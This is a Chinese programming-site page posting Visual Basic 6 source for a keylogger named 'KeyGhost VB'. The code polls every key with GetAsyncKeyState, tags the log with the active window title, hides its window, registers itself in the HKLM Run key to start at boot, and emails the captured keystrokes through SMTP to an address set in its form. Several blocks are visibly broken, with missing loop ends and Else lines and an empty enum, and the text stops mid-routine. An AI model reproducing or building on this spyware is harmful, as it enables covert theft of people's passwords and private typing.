

王朝vb·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  



Attribute VB_Name = "mFuncation"


Public Function Hook(ByVal hWnd As Long)



lpPrevWndProc = SetWindowLong(hWnd, GWL_WNDPROC, AddressOf WindowProc)

End Function


Public Sub UnHook(ByVal hWnd As Long)


Call SetWindowLong(hWnd, GWL_WNDPROC, lpPrevWndProc)

End Sub


Public Function CAPSLOCKON() As Boolean

Static bInit As Boolean

Static bOn As Boolean

If Not bInit Then

While GetAsyncKeyState(VK_CAPITAL)


bOn = GetKeyState(VK_CAPITAL)

bInit = True


If GetAsyncKeyState(VK_CAPITAL) Then

While GetAsyncKeyState(VK_CAPITAL)



bOn = Not bOn

End If

End If


End Function


Public Function GetCaption(WindowHandle As Long) As String

Dim strBuffer As String, lngTextLength As Long

lngTextLength = GetWindowTextLength(WindowHandle)

strBuffer = String(lngTextLength, 0)

Call GetWindowText(WindowHandle, strBuffer, lngTextLength + 1)

GetCaption$ = strBuffer

End Function

Function WindowProc(ByVal hw As Long, ByVal uMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

WindowProc = CallWindowProc(lpPrevWndProc, hw, uMsg, wParam, lParam)

End Function


Attribute VB_Name = "mAPI"


Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long

Declare Function GetAsyncKeyState Lib "user32" (ByVal VKEY As Long) As Integer

Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer

Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long

Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long

Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Declare Function GetForegroundWindow Lib "user32.dll" () As Long

Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hWnd As Long) As Long


Const VK_CAPITAL = &H14

Const REG As Long = 1

Const HKEY_LOCAL_MACHINE As Long = &H80000002


Const SWP_NOMOVE = &H2

Const SWP_NOSIZE = &H1


Const GWL_WNDPROC = -4



Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"

Object = "{3B7C8863-D78F-101B-B9B5-04021C009402}#1.2#0"; "RICHTX32.OCX"

Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"

Begin VB.Form frmMain

BorderStyle = 1 'Fixed Single

Caption = "键盘幽灵-VB版"

ClientHeight = 4305

ClientLeft = 45

ClientTop = 435

ClientWidth = 6750

Icon = "frmMain.frx":0000

LinkTopic = "Form1"

MaxButton = 0 'False

MinButton = 0 'False

ScaleHeight = 4305

ScaleWidth = 6750

StartUpPosition = 3 '窗口缺省

Begin VB.CheckBox chkShowForm

Caption = "实现出现运行设置窗体"

Enabled = 0 'False

Height = 255

Left = 3000

TabIndex = 15

Top = 1920

Width = 2175


Begin MSWinsockLib.Winsock Winsock1

Left = 720

Top = 120

_ExtentX = 741

_ExtentY = 741

_Version = 393216


Begin VB.Timer Timer2

Enabled = 0 'False

Interval = 20000

Left = 5520

Top = 3360


Begin VB.Timer Timer1

Enabled = 0 'False

Interval = 1

Left = 5160

Top = 3360


Begin VB.CommandButton cmdExit

Caption = "退出"

Height = 375

Left = 4800

TabIndex = 14

Top = 3840

Width = 975


Begin RichTextLib.RichTextBox txtKeyLog

Height = 735

Left = 4080

TabIndex = 13

Top = 840

Visible = 0 'False

Width = 2415

_ExtentX = 4260

_ExtentY = 1296

_Version = 393217

ScrollBars = 3

DisableNoScroll = -1 'True

Appearance = 0

TextRTF = $"frmMain.frx":08CA


Begin VB.CommandButton cmdStart

Caption = "确定"

Height = 375

Left = 3480

TabIndex = 12

Top = 3840

Width = 1095


Begin VB.TextBox txtEmail

Appearance = 0 'Flat

Enabled = 0 'False

Height = 270

Left = 2280

TabIndex = 11

Top = 3360

Width = 2655


Begin VB.TextBox txtPort

Alignment = 2 'Center

Appearance = 0 'Flat

Enabled = 0 'False

Height = 270

Left = 5280

MaxLength = 5

TabIndex = 9

Text = "25"

Top = 2940

Width = 735


Begin VB.TextBox txtSmtp

Appearance = 0 'Flat

Enabled = 0 'False

Height = 270

Left = 2280

TabIndex = 7

Text = "Localhost"

Top = 2940

Width = 2655


Begin VB.CheckBox chkSendMail

Caption = "是否将键盘记录以电子邮件发送到自动的EMAIL中"

Height = 375

Left = 240

TabIndex = 5

Top = 2400

Width = 4335


Begin VB.CheckBox chkStartup

Caption = "启动时是否自动运行"

Height = 255

Left = 240

TabIndex = 4

Top = 1920

Width = 2415


Begin VB.CommandButton cmdSavePath

Appearance = 0 'Flat

Caption = "..."

Enabled = 0 'False

Height = 255

Left = 3240

TabIndex = 3

Top = 1440

Width = 495


Begin VB.TextBox txtFilePath

Appearance = 0 'Flat

Enabled = 0 'False

Height = 270

Left = 240

TabIndex = 2

Top = 1440

Width = 2895


Begin MSComDlg.CommonDialog cdgSaveFile

Left = 120

Top = 120

_ExtentX = 847

_ExtentY = 847

_Version = 393216

DialogTitle = "保存键盘记录文件"

Filter = "文本文件(*.txt)|*.txt"

InitDir = "c:\"


Begin VB.CheckBox chkSaveFile

Caption = "是否将记录存储为文件"

Height = 255

Left = 240

TabIndex = 1

Top = 960

Width = 2295


Begin VB.Label lblEmail

Alignment = 2 'Center

AutoSize = -1 'True

Caption = "Email:"

Enabled = 0 'False

Height = 180

Left = 1560

TabIndex = 10

Top = 3420

Width = 630


Begin VB.Label lblPort

Alignment = 2 'Center

AutoSize = -1 'True

Caption = ":"

Enabled = 0 'False

Height = 180

Left = 5040

TabIndex = 8

Top = 3000

Width = 180


Begin VB.Label lblSmtp

Alignment = 2 'Center

AutoSize = -1 'True

Caption = "Smtp服务器:"

Enabled = 0 'False

Height = 180

Left = 1080

TabIndex = 6

Top = 3000

Width = 1080


Begin VB.Label lblAppName

Alignment = 2 'Center

AutoSize = -1 'True

Caption = "运行设定"

BeginProperty Font

Name = "华文彩云"

Size = 26.25

Charset = 134

Weight = 400

Underline = 0 'False

Italic = 0 'False

Strikethrough = 0 'False


Height = 540

Left = 2310

TabIndex = 0

Top = 240

Width = 2115



Attribute VB_Name = "frmMain"

Attribute VB_GlobalNameSpace = False

Attribute VB_Creatable = False

Attribute VB_PredeclaredId = True

Attribute VB_Exposed = False


Private Enum SMTP_State








End Enum


Dim strWindow As String

Dim strErrorFile As String

Dim m_State As SMTP_State

Private Sub chkSaveFile_Click()

If chkSaveFile.Value = Checked Then

txtFilePath.Enabled = True

cmdSavePath.Enabled = True


txtFilePath.Enabled = False

cmdSavePath.Enabled = False

End If

End Sub

Private Sub chkSendMail_Click()

If chkSendMail.Value = Checked Then

lblSmtp.Enabled = True

txtSmtp.Enabled = True

lblPort.Enabled = True

txtPort.Enabled = True

lblEmail.Enabled = True

txtEmail.Enabled = True


lblSmtp.Enabled = False

txtSmtp.Enabled = False

lblPort.Enabled = False

txtPort.Enabled = False

lblEmail.Enabled = False

txtEmail.Enabled = False

End If

End Sub

Private Sub chkStartup_Click()

If chkStartup.Value = Checked Then

chkShowForm.Enabled = True


chkShowForm.Enabled = False

End If

End Sub

Private Sub cmdExit_Click()

Unload Me


End Sub

Private Sub cmdSavePath_Click()


txtFilePath.Text = cdgSaveFile.FileName

End Sub

Private Sub cmdStart_Click()

Dim objWSHShell As Object

Set objWSHShell = CreateObject("WScript.Shell")

If chkSaveFile.Value = Checked Then

If txtFilePath.Text = "" Then

MsgBox "键盘日志文件保存目录为空", vbOKOnly, "错误"

Exit Sub

End If

SaveSetting App.EXEName, "Setting", "SaveFile", "True"

SaveSetting App.EXEName, "Setting", "FilePath", txtFilePath.Text

Open txtFilePath.Text For Append As #1

Write #1, vbCrLf

Write #1, "[日志开始时间: " & Now & "]" '日志开始记录时间

Write #1, String(50, "-")

Close #1


SaveSetting App.EXEName, "Setting", "SaveFile", "False"

SaveSetting App.EXEName, "Setting", "FilePath", ""

End If

If chkSendMail.Value = Checked Then

If txtEmail.Text = "" Or txtSmtp.Text = "" Or txtPort.Text = "" Then

MsgBox "请填写完整的邮件信息", vbOKOnly, "错误"

Exit Sub

End If

SaveSetting App.EXEName, "Setting", "SendMail", "True"

SaveSetting App.EXEName, "Setting", "Smtp", txtSmtp.Text

SaveSetting App.EXEName, "Setting", "Port", txtPort.Text

SaveSetting App.EXEName, "Setting", "Email", txtEmail.Text


SaveSetting App.EXEName, "Setting", "SendMail", "False"

SaveSetting App.EXEName, "Setting", "Smtp", ""

SaveSetting App.EXEName, "Setting", "Port", ""

SaveSetting App.EXEName, "Setting", "Email", ""

End If

If chkStartup.Value = Checked Then

SaveSetting App.EXEName, "Setting", "StartUp", "True"

objWSHShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KeyGhost-VB", App.Path & "\" & App.EXEName & ".EXE"

If chkShowForm.Value = Checked Then

SaveSetting App.EXEName, "Setting", "ShowForm", "True"


SaveSetting App.EXEName, "Setting", "ShowForm", "False"

End If


objWSHShell.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\KeyGhost-VB", ""

SaveSetting App.EXEName, "Setting", "StartUp", "False"

End If

Timer1.Enabled = True

Timer2.Enabled = True

Me.Visible = False

End Sub

Private Sub Form_Load()


If App.PrevInstance = True Then

Unload Me


End If

Hook Me.hWnd

If GetSetting(App.EXEName, "Setting", "SaveFile") = "True" Then

chkSaveFile.Value = Checked

txtFilePath.Enabled = True

cmdSavePath.Enabled = True

End If

If GetSetting(App.EXEName, "Setting", "FilePath") <> "" Then

txtFilePath.Text = GetSetting(App.EXEName, "Setting", "FilePath")

End If

If GetSetting(App.EXEName, "Setting", "SendMail") = "True" Then

chkSendMail.Value = Checked

lblSmtp.Enabled = True

txtSmtp.Enabled = True

lblPort.Enabled = True

txtPort.Enabled = True

lblEmail.Enabled = True

txtEmail.Enabled = True

End If

If GetSetting(App.EXEName, "Setting", "Smtp") <> "" Then

txtSmtp.Text = GetSetting(App.EXEName, "Setting", "Smtp")

End If

If GetSetting(App.EXEName, "Setting", "Port") <> "" Then

txtPort.Text = GetSetting(App.EXEName, "Setting", "Port")

End If

If GetSetting(App.EXEName, "Setting", "Email") <> "" Then

txtEmail.Text = GetSetting(App.EXEName, "Setting", "Email")

End If

If GetSetting(App.EXEName, "Setting", "StartUp") = "True" Then

chkStartup.Value = Checked

If GetSetting(App.EXEName, "Setting", "ShowForm") = "True" Then

chkShowForm.Value = Checked

Me.Visible = True


chkShowForm.Value = Checked


End If

End If

strWindow = GetCaption(GetForegroundWindow)

End Sub

Private Sub Form_Unload(Cancel As Integer)

UnHook Me.hWnd

End Sub


Private Sub Timer2_Timer()

If chkSaveFile.Value = Checked Then

Open txtFilePath.Text For Append As #1

Write #1, txtKeyLog.Text

Close #1


txtKeyLog.Text = ""

End If

If chkSendMail.Value = Checked Then

Winsock1.Connect Trim(txtSmtp.Text), CInt(txtPort.Text)


End If

End Sub

Private Sub txtPort_KeyPress(KeyAscii As Integer)

Select Case KeyAscii

Case 48 To 57

Case vbKeyBack, vbKeyTab

Case Else

KeyAscii = 0

End Select

End Sub

Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)

Dim strServerResponse As String

Dim strResponseCode As String

Dim strDataToSend As String

Winsock1.GetData strServerResponse

strResponseCode = Left(strServerResponse, 3)

If strResponseCode = "250" Or _

strResponseCode = "220" Or _

strResponseCode = "354" Then

Select Case m_State


m_State = MAIL_HELO

strDataToSend = Trim(txtEmail.Text)

strDataToSend = Left(strDataToSend, _

InStr(1, strDataToSend, "@") - 1)

Winsock1.SendData "HELO " & strDataToSend & vbCrLf


m_State = MAIL_FROM

Winsock1.SendData "MAIL FROM:" & "" & vbCrLf



Winsock1.SendData "RCPT TO:" & Trim(txtEmail.Text) & vbCrLf


m_State = MAIL_DATA

Winsock1.SendData "DATA" & vbCrLf


m_State = MAIL_DOT

Winsock1.SendData "Subject:" & "键盘幽灵-VB版键盘记录文件" & Now & vbLf & vbCrLf

Dim varLines As Variant

Dim varLine As Variant

Dim strMessage As String

strMessage = txtKeyLog.Text & vbCrLf & vbCrLf

Winsock1.SendData "." & vbCrLf


m_State = MAIL_QUIT

Winsock1.SendData "QUIT" & vbCrLf



End Select



If Not m_State = MAIL_QUIT Then

strErrorFile = "errorlog.txt"

Open App.Path & "\" & strErrorFile For Append As #2

Write #2, "邮件发送错误:" & Number & Description & vbCrLf

Close #2

End If

End If

End Sub

Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean)

strErrorFile = "errorlog.txt"

Open App.Path & "\" & strErrorFile For Append As #2

Write #2, "邮件发送错误:" & Number & Description & vbCrLf

Close #2

End Sub

Private Sub Timer1_Timer()


If strWindow <> GetCaption(GetForegroundWindow) Then

strWindow = GetCaption(GetForegroundWindow)

txtKeyLog.Text = txtKeyLog.Text & Chr(13) & Chr(13) & "[" & Time & " - 窗口: " & strWindow & "]" & Chr(13)

End If


'按Ctrl + lngShift + F12则呼叫本程序

Dim lngKeyState As Long

Dim lngShift As Long

lngShift = GetAsyncKeyState(vbKeyShift)


lngKeyState = GetAsyncKeyState(vbKeyA)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "A"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "a"

End If


lngKeyState = GetAsyncKeyState(vbKeyB)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "B"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "b"

End If


lngKeyState = GetAsyncKeyState(vbKeyC)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "C"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "c"

End If


lngKeyState = GetAsyncKeyState(vbKeyD)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "D"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "d"

End If


lngKeyState = GetAsyncKeyState(vbKeyE)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "E"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "e"

End If


lngKeyState = GetAsyncKeyState(vbKeyF)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "F"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "f"

End If


lngKeyState = GetAsyncKeyState(vbKeyG)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "G"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "g"

End If


lngKeyState = GetAsyncKeyState(vbKeyH)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "H"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "h"

End If


lngKeyState = GetAsyncKeyState(vbKeyI)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "I"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "i"

End If


lngKeyState = GetAsyncKeyState(vbKeyJ)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "J"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "j"

End If


lngKeyState = GetAsyncKeyState(vbKeyK)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "K"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "k"

End If


lngKeyState = GetAsyncKeyState(vbKeyL)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "L"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "l"

End If


lngKeyState = GetAsyncKeyState(vbKeyM)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "M"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "m"

End If


lngKeyState = GetAsyncKeyState(vbKeyN)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "N"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "n"

End If


lngKeyState = GetAsyncKeyState(vbKeyO)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "O"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "o"

End If


lngKeyState = GetAsyncKeyState(vbKeyP)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "P"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "p"

End If


lngKeyState = GetAsyncKeyState(vbKeyQ)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "Q"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "q"

End If


lngKeyState = GetAsyncKeyState(vbKeyR)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "R"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "r"

End If


lngKeyState = GetAsyncKeyState(vbKeyS)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "S"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "s"

End If


lngKeyState = GetAsyncKeyState(vbKeyT)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "T"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "t"

End If


lngKeyState = GetAsyncKeyState(vbKeyU)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "U"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "u"

End If


lngKeyState = GetAsyncKeyState(vbKeyV)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "V"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "v"

End If


lngKeyState = GetAsyncKeyState(vbKeyW)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "W"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "w"

End If


lngKeyState = GetAsyncKeyState(vbKeyX)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "X"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "x"

End If


lngKeyState = GetAsyncKeyState(vbKeyY)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "Y"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "y"

End If


lngKeyState = GetAsyncKeyState(vbKeyZ)

If (CAPSLOCKON = True And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = False And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "Z"

End If

If (CAPSLOCKON = False And lngShift = 0 And (lngKeyState And &H1) = &H1) Or (CAPSLOCKON = True And lngShift <> 0 And (lngKeyState And &H1) = &H1) Then

txtKeyLog.Text = txtKeyLog.Text + "z"

End If


lngKeyState = GetAsyncKeyState(vbKey1)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "1"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "!"

End If


lngKeyState = GetAsyncKeyState(vbKey2)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "2"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "@"

End If


lngKeyState = GetAsyncKeyState(vbKey3)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "3"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "#"

End If


lngKeyState = GetAsyncKeyState(vbKey4)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "4"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "$"

End If


lngKeyState = GetAsyncKeyState(vbKey5)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "5"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "%"

End If


lngKeyState = GetAsyncKeyState(vbKey6)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "6"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "^"

End If


lngKeyState = GetAsyncKeyState(vbKey7)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "7"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "&"

End If


lngKeyState = GetAsyncKeyState(vbKey8)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "8"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "*"

End If


lngKeyState = GetAsyncKeyState(vbKey9)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "9"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "("

End If


lngKeyState = GetAsyncKeyState(vbKey0)

If lngShift = 0 And (lngKeyState And &H1) = &H1 Then

txtKeyLog.Text = txtKeyLog.Text + "0"

End If

If lngShift <> 0 And (lngKeyState And &H1) = &H1 Then

